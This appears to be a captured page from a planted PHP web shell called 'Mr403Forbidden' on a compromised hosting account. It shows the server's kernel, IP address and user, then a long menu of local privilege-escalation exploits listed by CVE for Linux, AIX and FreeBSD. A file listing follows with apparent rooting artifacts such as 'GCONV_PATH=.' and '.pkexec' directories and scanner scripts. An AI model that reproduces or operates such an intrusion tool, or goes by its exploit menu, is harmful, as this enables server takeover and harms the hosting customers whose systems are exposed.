./Mr403Forbidden
Information Server
System: Linux premium96.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
Software:LiteSpeed
PHP Version:8.1.31 PHP Os: Linux
Server IP:198.187.29.196
Your IP:3.141.45.90
User:medigdei (812) | Group: medigdei (813)
Safe Mode:OFF
MYSQL:OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: OFF | PKEXEC: OFF
Disable Function:
Software:
PHP Version:
Server IP:
Your IP:
User:
Safe Mode:
MYSQL:
Disable Function:
NONE
CVE N/A | Sudo prompt overflow in v1.5.7 to 1.6.5p2
CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
CVE-2003-0127 | Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)
CVE-2004-0077 | Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation
CVE-2004-1235 | Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)
CVE N/A | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation
CVE-2005-0736 | Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation
CVE-2005-1263 | Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow
CVE-2006-2451 | Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
CVE-2006-3626 | Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation
CVE N/A | Compress v4.2.4 local test exploit
CVE N/A | Local GNU Awk 3.1.0-x proof of concept exploit
EDB-ID-4756 | Linux Kernel < 2.6.11.5 Bluetooth Stack Localroot Exploit
CVE-2008-0600 | Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
CVE-2008-0900 | Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
CVE-2008-4210 | Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation
CVE-2009-1185 | Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)
CVE-2009-1337 | Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation CVE-2009-2692 | Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)
CVE-2009-2698 | Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
CVE-2009-3547 | Linux 2.6.x fs/pipe.c Local Privilege Escalation
CVE-2010-1146 | ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation
CVE-2010-2959 | Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation
CVE-2010-3081 | Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation
CVE-2010-3301 | Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
CVE-2010-3437 | Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure
CVE-2010-3904 | Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
CVE-2010-4073 | Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation
CVE-2010-4258 | Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
CVE-2010-4347 | Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation CVE-2011-1021 | Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation
CVE-2011-2777 | Acpid 1:
2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation
CVE-2011-1485 | pkexec - Race Condition Privilege Escalation
EDB-ID-18071 | Calibre E-Book Reader - Local Privilege Escalation
EDB-ID-17391 | Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation
EDB-ID-15944 | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)
CVE-2012-0056 | Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation
CVE-2012-3524 | libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation
CVE-2012-0809 | sudo 1.8.0 < 1.8.3p1 - Format String
CVE-2013-0268 | Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation
CVE-2013-1763 | Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)
CVE-2013-1858 | Linux Kernel 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation
CVE-2013-2094 | Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)
CVE-2014-0038 | Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)
CVE-2014-0196 | Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation
CVE-2014-3153 | Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation
CVE-2014-4014 | Linux Kernel 3.13 - SGID Privilege Escalation
CVE-2014-4699 | Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation
CVE-2014-5284 | OSSEC 2.8 - 'hosts.deny' Local Privilege Escalation CVE-2015-1328 | Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
CVE-2015-7547 | glibc - 'getaddrinfo' Stack Buffer Overflow (PoC) CVE-2016-0728 | Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)
CVE-2016-2384 | Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation
CVE-2016-5195 | Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
CVE-2016-8655 | Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)
CVE-2016-9793 | Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation
CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation
CVE-2017-6074 | Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation
CVE-2017-7308 | Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation
CVE-2017-7494 | Samba 3.5.0 - Remote Code Execution
CVE-2017-7533 | Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
CVE-2017-16939 | Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
CVE-2017-16995 | Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
CVE-2017-1000112 | Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)
CVE-2017-1000367 | Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation
CVE-2018-1000001 | glibc < 2.26 - 'getcwd()' Local Privilege Escalation
CVE-2019-7304 | snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)
CVE-2019-13272 | Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation
IBM AIX
CVE-2013-4011 - IBM AIX 6.1 / 7.1 Localroot Privilege Escalation
FreeBSD
EDB-ID-1311 | FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure
CVE-2008-3531 | FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
CVE-2008-5736 | FreeBSD 6.4 - Netgraph Privilege Escalation
CVE-2009-3527 | FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition
CVE-2009-4146 | FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation
EDB-ID-9860 | FreeBSD 7.2 - VFS/devfs Race Condition
CVE-2010-2020 | FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation
CVE-2010-2693 | FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation
CVE-2010-4210 | FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation
CVE-2011-4062 | FreeBSD - UIPC socket heap Overflow (PoC)
CVE-2011-4122 | OpenPAM - 'pam_start()' Local Privilege Escalation
CVE-2011-4862 | TelnetD encrypt_keyid - Function Pointer Overwrite
CVE-2012-0217 | FreeBSD 8.3 - 9.0 amd64 Privilege Escalation
EDB-ID-28718 | FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation
CVE-2013-2171 | FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
Name | Type | Last Edit | Size | Owner |
Permission | Action |
.. | ||||||
.pkexec | dir | 2024-12-20 17:41 | - | medigdei |
||
.tmb | dir | 2024-10-18 0:40 | - | medigdei |
dr-xr-xr-x | |
.well-known | dir | 2024-11-14 14:40 | - | medigdei |
dr-xr-xr-x | |
GCONV_PATH=. | dir | 2024-12-20 17:41 | - | medigdei |
||
mr403forbiddenrooting | dir | 2024-12-22 20:07 | - | medigdei |
||
403.php | file | 2024-12-19 21:40 | 53.77 KB | medigdei |
||
adminer.php | file | 2024-12-19 3:49 | 356.21 KB | medigdei |
||
auto.tar.gz | file | 2024-12-22 7:05 | 14 B | medigdei |
||
cah.php | file | 2024-12-21 6:23 | 1.22 MB | medigdei |
||
cah2.php | file | 2024-12-22 6:04 | 967.7 KB | medigdei |
||
click.php | file | 2024-12-16 1:18 | 68 B | medigdei |
||
click.zip | file | 2024-12-16 1:18 | 154.93 KB | medigdei |
||
error_log | file | 2024-12-22 16:52 | 4.96 MB | medigdei |
||
l.php | file | 2024-12-20 3:45 | 2.85 KB | medigdei |
||
result-scanner.html | file | 2024-12-20 19:33 | 1.57 KB | medigdei |
||
scan.php | file | 2024-12-20 17:17 | 4 KB | medigdei |
© ./Mr403Forbidden